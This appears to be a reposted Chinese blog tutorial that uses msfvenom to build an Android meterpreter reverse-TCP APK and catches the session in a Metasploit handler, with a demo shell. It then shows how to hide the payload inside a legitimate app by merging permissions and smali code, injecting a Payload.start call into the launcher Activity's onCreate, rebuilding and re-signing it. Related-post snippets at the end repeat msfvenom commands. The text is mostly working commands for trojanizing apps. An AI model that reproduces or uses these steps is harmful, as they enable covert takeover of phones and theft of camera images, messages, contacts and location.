2. 程式人生 > >msfvenom生成apk payload然後得到meterpreter shell

msfvenom生成apk payload然後得到meterpreter shell

阿新 發佈:2018-11-15

先生成一個payload,帶上meterpreter監聽的地址和埠:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk

由於大號埠在我的wifi環境下無法出去,所以這裡我設定為80埠。
然後安裝這個apk到手機。
注意不要在主機上用nc監聽,雖然能收到來自apk的TCP包,但是那只是心跳包,沒有資料的。
然後用root許可權開啟msfconsole(因為要監聽在80埠,得用root許可權才行),在msf上監聽:

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 80
set PAYLOAD android/meterpreter/reverse_tcp
exploit

Demo

在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
用前置攝像頭拍到的照片
在這裡插入圖片描述
最後不知道做什麼了,就用一個android的shell:

meterpreter > shell
Process 1 created.
Channel 1 created.

pwd
/data/data/com.metasploit.stage/files
id
uid=10113(u0_a113) gid=10113(u0_a113) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50113(all_a113) context=u:r:untrusted_app:s0
su

pwd
/data/data/com.metasploit.stage/files
ls
cd ..
ls
cache
files
lib
cd lib
ls
cd ../..
ls
opendir failed, Permission denied

參考:https://nestedif.com/android-security/android-reverse-shell-using-metasploit/

將生成的payload整合到正常apk中

  1. 用apktool對msf.apk進行反編譯;用apktool對helloworld.apk進行反編譯。
  2. 將msf.apk中的AndroidManifest.xml許可權加到helloworld.apk的AndroidManifest.xml中。
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
  1. 將apktool得到的smali目錄下的所有檔案複製到helloworld.apk的smali目錄下。
  2. 然後找到原apk中的入口Activity的onCreate()方法:
    在這裡插入圖片描述
    在其下面一行加入:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
  1. 回編譯:
apktool b helloworld(使用apktool反編譯helloworld.apk生成的目錄)

在helloworld/dist目錄會得到一個apk。
6. 此時得到的apk是沒有簽名的,需要用jarsigner對其簽名。(如果沒有keystore檔案,可以用命令先生成一個)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore C:\Users\caiqiqi\cqq.keystore E:\BaiduNetdiskDownload\apktool\helloworld\dist\helloworld.apk cqq

簽名之後會覆蓋原始的helloworld.apk。

參考:https://www.blackhillsinfosec.com/embedding-meterpreter-in-android-apk/
自動化指令碼:https://github.com/yoda66/AndroidEmbedIT/blob/master/android_embedit.py

Demo

相關推薦

msfvenom生成apk payload然後得到meterpreter shell

先生成一個payload,帶上meterpreter監聽的地址和埠: msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk 由於大號埠在我的wif

msfvenom生成各類Payload命令

wan info ati sar scripting inner bash ret plan Often one of the most useful (and to the beginner underrated) abilities of Metasploit is t

msfvenom生成各種Payload命令

msfvenom生成各種Payload命令 msfvenom -l 列出所有模組,攻擊載荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<You

msfvenomapk註入payload

exploit xpl 路徑 all ret nom hal install 重新 首先安裝apt-get install apkinjector 這個東西,msfvenom重新組裝apk的時候會自動調用 msfvenom -x /路徑/apk android/meterp

msfvenom生成payload命令+內網透到外網

   進入msfconsole並選擇exploit/multi /handler。為所使用的相關有效負載執行'set payload'並配置所有必需的選項(LHOST,LPORT等)。 執行並等待有效負載執行。對於下面的示例,它是非常自我解釋但LHOST應填入您的IP地址(如果在網路內攻擊,則為LAN I

問個生成apk文件的問題

aid 5% music ongl 文件的 文件 http apk lis %E5%AE%9E%E7%8E%B0%E8%87%AA%E5%AE%9A%E4%B9%89%E6%A0%87%E9%A2%98%E6%A0%8F%28%E8%BD%AC%E8%BD%BD%29 h

android如何生成apk文件

androi opencv gles text ttext openmp openresty 生成 open edittext%E6%96%87%E6%9C%AC%E5%8F%98%E5%8C%96%E7%9B%91%E5%90%AC%E4%BA%8B%E4%BB%B6

Android Studio 超級簡單的打包生成apk

roi androi detail 生成 http blank oid 簡單 log http://blog.csdn.net/woaichimahua/article/details/54427528Android Studio 超級簡單的打包生成apk

Android Studio 打包生成 APK

如果 sign ext 對話 http ner 分享 技術 oid 1. 第一步 Build -> Generate Signed APK 2. 之後會要求開發者輸入相關的密鑰文件和密碼 如果有則找到對應的 .jks 文件輸入密碼完成相應操作,否則則創建一個對

Android Studio 打包生成apk

self one 直接 word uil 編譯 jpg content 但是 打開AndroidStudio,並且打開想要生成apk文件的項目。 點擊工具欄上面的“Builder” 點擊“Builder”之後在下拉菜單裏面可以看到“Genara

利用JDK自帶的keytool生成SSL證書然後導入到SpringBoot

生成 密鑰 clas alias 自帶 就會 輸入 http -type 一:生成命令如下(這一步生成的暫不知道幹嘛用的) E:\Desktop\Documents\證書>keytool -genkey -alias tomcat -keypass 123456

Android Studio打包生成APK教程

src 變量名 nts .apk variants idt test filename 一個 一、修改版本和指定生成APK文件名【可選】 將項目切換到Project視圖,打開app目錄下的build.gradle文件 1.1 修定軟件版本 versionCode是app的大

使用 jenkins 自動化編譯cordova for android 生成 APK

apk app 開發 啟動 安卓 自動 class 系統 編寫 地址 引言 前文中已經介紹了什麽是cordova 為什麽要用cordova,基礎的環境搭建以及如何編譯打包生成APK安裝包,接下來我們介紹如何使用Jenkins 自動化編譯打包生成APK安裝包! 服務器搭建

android打包生成apk時自定義文件名版本號。自定義項目字段等等

field col each deb 自定義 文件名 all != null 早期的AS2.0版本左右中這樣配置: app---->build.gradle中設置 applicationVariants.all { variant ->

Android Studio+SVN配置生成apk文件

date 完成後 ips tel spa 代碼 跳過 gen ise Android Studio 是谷歌推出一個Android集成開發工具,基於IntelliJ IDEA. 類似 Eclipse ADT,Android Studio 提供了集成的 Android 開發工具

使用Python定時執行一任務,自動登錄某web系統,生成報表,然後發送郵件給指定人員

sel web mail word 發送郵件 查詢條件 xxxxx receive emp 一、項目需求 每周從A系統生成一張Excel報表,發送此報表給指定人員,相關人員依據此報表去完成後續的工作。 項目限制: 1、無法通過E

Android studio生成APK打包,修改生成APK的路徑和名字

在app的build.gradle的android新增輸出時候的路徑和名字 android { compileSdkVersion 26 defaultConfig { applicationId "com.example.test" minSdk

微信小程式生成分享圖然後儲存圖片分享朋友圈

微信小程式可以實現快速的轉發好友實現分享,但是不能直接分享到朋友圈,但是有需要要這麼做,要怎麼實現呢? 檢視文件之後,大概有了實現思路 1.使用微信小程式的wx.createCanvasContext()方法,繪製圖片; 2.使用wx.canvasToTempFilePath()方法,把

通過./gradlew assembleRelease生成apk的過程

./gradlew clean執行以下任務:1. task ':clean' 清理,刪除專案根目錄下的build資料夾,/build2. task ':app:clean' 清理,刪除app目錄下的build資料夾,/app/build ./gradlew assemble

python爬蟲如何獲取網頁資訊時,發現所需要的資訊是動態生成的,然後抓包獲取到資訊來源的URL?

如果在利用爬蟲爬取網頁資料的時候,發現是動態生成的時候,目前來看主要表現在以下幾種: 以介面的形式生成資料,這種形式其實挺好處理的,比較典型的是知乎的使用者資訊,我們只要知道介面的URL,就可以不用再考慮頁面本身的內容 以知乎為例,我們在爬取使用者資訊的時候,可能